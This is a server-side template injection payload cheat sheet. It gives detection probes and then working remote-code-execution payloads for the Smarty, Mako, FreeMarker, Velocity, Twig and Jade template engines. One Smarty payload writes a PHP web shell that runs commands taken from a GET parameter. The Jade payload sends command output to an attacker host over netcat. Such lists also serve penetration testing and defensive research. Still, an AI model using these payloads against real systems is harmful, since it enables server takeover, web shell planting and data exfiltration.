Detect:
${7*7}
{{7*7}}
a{*comment*}b 			Smarty
${"z".join("ab")}		Mako
{{7*'7'}}			Jinja2, Twig

Exploit:
Smarty:
{php}echo `id`;{/php}
{self::getStreamVariable("file:///proc/self/loginuid")}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?
>",self::clearConfig())}
Mako:
<%
import os
x=os.popen('id').read()
%>
${x}
FreeMarker:
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }
Velocity:
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
Twig:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
Jade:
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.net 80')




